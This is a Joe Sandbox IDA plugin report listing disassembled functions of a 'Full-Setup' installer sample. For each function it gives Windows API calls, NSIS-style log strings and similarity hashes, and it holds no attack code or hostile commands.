Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

@bG, xrefs: 00406162
RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

`G, xrefs: 0040246E
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00043800,00000064,0013A08C), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
